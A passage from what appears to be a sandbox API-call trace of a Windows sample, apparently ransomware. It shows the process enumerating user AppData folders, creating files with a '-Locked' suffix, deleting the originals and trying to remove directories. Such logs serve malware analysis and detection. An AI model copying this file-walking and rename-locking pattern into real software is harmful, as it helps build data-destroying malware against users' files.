lpFilePart=0x0) returned 0x2a [0307.613] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.613] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.613] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x346338dd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x346338dd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0307.638] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Unistore", cAlternateFileName="")) returned 1 [0307.638] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 1 [0307.638] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 0 [0307.638] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0307.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0307.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0307.639] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", lpFilePart=0x0) returned 0x29 [0307.640] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\", lpFilePart=0x0) returned 0x2a [0307.640] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.640] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.640] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x346338dd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x346338dd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0307.641] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x23c4973c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x23c4973c, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x23c4973c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Unistore", cAlternateFileName="")) returned 1 [0307.641] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x7c627099, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x7c627099, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 1 [0307.641] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.641] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0307.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0307.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af140) returned 1 [0307.641] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", nBufferLength=0x105, lpBuffer=0x1aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", lpFilePart=0x0) returned 0x2e [0307.641] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\", nBufferLength=0x105, lpBuffer=0x1aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\", lpFilePart=0x0) returned 0x2f [0307.642] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\*", lpFindFileData=0x1aee68 | out: lpFindFileData=0x1aee68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x346338dd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x346338dd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.642] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x346338dd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x346338dd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.642] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34629a95, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34629a95, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34629a95, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CalendarCache.dat-Locked", cAlternateFileName="CALEND~2.DAT")) returned 1 [0307.642] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.643] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af100) returned 1 [0307.643] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af10c) returned 1 [0307.643] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af140) returned 1 [0307.643] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", nBufferLength=0x105, lpBuffer=0x1aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", lpFilePart=0x0) returned 0x2e [0307.643] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\", nBufferLength=0x105, lpBuffer=0x1aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\", lpFilePart=0x0) returned 0x2f [0307.643] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\*", lpFindFileData=0x1aee68 | out: lpFindFileData=0x1aee68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x346338dd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x346338dd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.643] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x346338dd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x346338dd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.643] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34629a95, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34629a95, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34629a95, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CalendarCache.dat-Locked", cAlternateFileName="CALEND~2.DAT")) returned 1 [0307.644] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34629a95, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34629a95, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34629a95, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CalendarCache.dat-Locked", cAlternateFileName="CALEND~2.DAT")) returned 0 [0307.644] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af100) returned 1 [0307.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af10c) returned 1 [0307.644] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat-Locked-Locked", lpFilePart=0x0) returned 0x4e [0307.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefec) returned 1 [0307.644] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\temp\\calendarcache.dat-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0307.645] GetFileType (hFile=0x444) returned 0x1 [0307.645] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefe8) returned 1 [0307.645] GetFileType (hFile=0x444) returned 0x1 [0307.646] CloseHandle (hObject=0x444) returned 1 [0307.646] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat-Locked", nBufferLength=0x105, lpBuffer=0x1aec78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat-Locked", lpFilePart=0x0) returned 0x47 [0307.647] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp\\CalendarCache.dat-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\temp\\calendarcache.dat-locked")) returned 1 [0307.647] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", nBufferLength=0x105, lpBuffer=0x1aeccc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp", lpFilePart=0x0) returned 0x2e [0307.647] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af118) returned 1 [0307.647] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\temp"), fInfoLevelId=0x0, lpFileInformation=0x1af198 | out: lpFileInformation=0x1af198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x241f3052, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x37c4cac4, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37c4cac4, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0307.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af114) returned 1 [0307.648] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\temp")) returned 0 [0307.648] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0307.648] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0307.648] CoTaskMemFree (pv=0x73f0b8) [0307.649] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", nBufferLength=0x105, lpBuffer=0x1aed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms", lpFilePart=0x0) returned 0x29 [0307.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af160) returned 1 [0307.649] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms"), fInfoLevelId=0x0, lpFileInformation=0x1af1e0 | out: lpFileInformation=0x1af1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x241f3052, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0307.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0307.650] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms")) returned 0 [0307.650] CoTaskMemAlloc (cb=0x404) returned 0x73f0b8 [0307.650] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x91, dwLanguageId=0x0, lpBuffer=0x73f0b8, nSize=0x200, Arguments=0x0 | out: lpBuffer="The directory is not empty.\r\n") returned 0x1d [0307.650] CoTaskMemFree (pv=0x73f0b8) [0307.651] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0307.651] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0307.652] CoTaskMemFree (pv=0x6c7110) [0307.652] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0307.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0307.652] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0307.653] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\", lpFilePart=0x0) returned 0x26 [0307.653] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb681b8a5, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb681b8a5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.653] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb681b8a5, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb681b8a5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.653] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f7168b0, ftCreationTime.dwHighDateTime=0x1d7d7fb, ftLastAccessTime.dwLowDateTime=0xdaa84840, ftLastAccessTime.dwHighDateTime=0x1d7e0d0, ftLastWriteTime.dwLowDateTime=0xdaa84840, ftLastWriteTime.dwHighDateTime=0x1d7e0d0, nFileSizeHigh=0x0, nFileSizeLow=0x293c, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LklvNehR.docx", cAlternateFileName="0LKLVN~1.DOC")) returned 1 [0307.653] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7f7d90, ftCreationTime.dwHighDateTime=0x1d7e1d9, ftLastAccessTime.dwLowDateTime=0x9686a720, ftLastAccessTime.dwHighDateTime=0x1d7e4cb, ftLastWriteTime.dwLowDateTime=0x9686a720, ftLastWriteTime.dwHighDateTime=0x1d7e4cb, nFileSizeHigh=0x0, nFileSizeLow=0x8152, dwReserved0=0x0, dwReserved1=0x0, cFileName="4f1_b1f1MI-TC9ElavwZ.gif", cAlternateFileName="4F1_B1~1.GIF")) returned 1 [0307.654] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8671e3a0, ftCreationTime.dwHighDateTime=0x1d7e4c5, ftLastAccessTime.dwLowDateTime=0xb4c186d0, ftLastAccessTime.dwHighDateTime=0x1d7e582, ftLastWriteTime.dwLowDateTime=0xb4c186d0, ftLastWriteTime.dwHighDateTime=0x1d7e582, nFileSizeHigh=0x0, nFileSizeLow=0xe27b, dwReserved0=0x0, dwReserved1=0x0, cFileName="5OX_uRta.avi", cAlternateFileName="")) returned 1 [0307.654] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e08eb70, ftCreationTime.dwHighDateTime=0x1d7d96f, ftLastAccessTime.dwLowDateTime=0x96266160, ftLastAccessTime.dwHighDateTime=0x1d7deba, ftLastWriteTime.dwLowDateTime=0x96266160, ftLastWriteTime.dwHighDateTime=0x1d7deba, nFileSizeHigh=0x0, nFileSizeLow=0x2cb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="8g0k0m8yj.png", cAlternateFileName="8G0K0M~1.PNG")) returned 1 [0307.654] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0307.654] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18a8ae90, ftCreationTime.dwHighDateTime=0x1d7e037, ftLastAccessTime.dwLowDateTime=0xad7653e0, ftLastAccessTime.dwHighDateTime=0x1d7e1f1, ftLastWriteTime.dwLowDateTime=0xad7653e0, ftLastWriteTime.dwHighDateTime=0x1d7e1f1, nFileSizeHigh=0x0, nFileSizeLow=0x10a1f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ahc LlOV.wav", cAlternateFileName="AHCLLO~1.WAV")) returned 1 [0307.654] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d817c90, ftCreationTime.dwHighDateTime=0x1d7e403, ftLastAccessTime.dwLowDateTime=0x9ba77510, ftLastAccessTime.dwHighDateTime=0x1d7e5a0, ftLastWriteTime.dwLowDateTime=0x9ba77510, ftLastWriteTime.dwHighDateTime=0x1d7e5a0, nFileSizeHigh=0x0, nFileSizeLow=0xee87, dwReserved0=0x0, dwReserved1=0x0, cFileName="awN7g2jy-.wav", cAlternateFileName="AWN7G2~1.WAV")) returned 1 [0307.655] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x619c9b70, ftCreationTime.dwHighDateTime=0x1d7d9cf, ftLastAccessTime.dwLowDateTime=0x7d05da70, ftLastAccessTime.dwHighDateTime=0x1d7dc7c, ftLastWriteTime.dwLowDateTime=0x7d05da70, ftLastWriteTime.dwHighDateTime=0x1d7dc7c, nFileSizeHigh=0x0, nFileSizeLow=0x626f, dwReserved0=0x0, dwReserved1=0x0, cFileName="B3G HOo r0SeaIBT.csv", cAlternateFileName="B3GHOO~1.CSV")) returned 1 [0307.655] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x454ae260, ftCreationTime.dwHighDateTime=0x1d7e050, ftLastAccessTime.dwLowDateTime=0x2735dda0, ftLastAccessTime.dwHighDateTime=0x1d7e651, ftLastWriteTime.dwLowDateTime=0x2735dda0, ftLastWriteTime.dwHighDateTime=0x1d7e651, nFileSizeHigh=0x0, nFileSizeLow=0xed4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="EFaRQ41J5EALf7Lll.mp3", 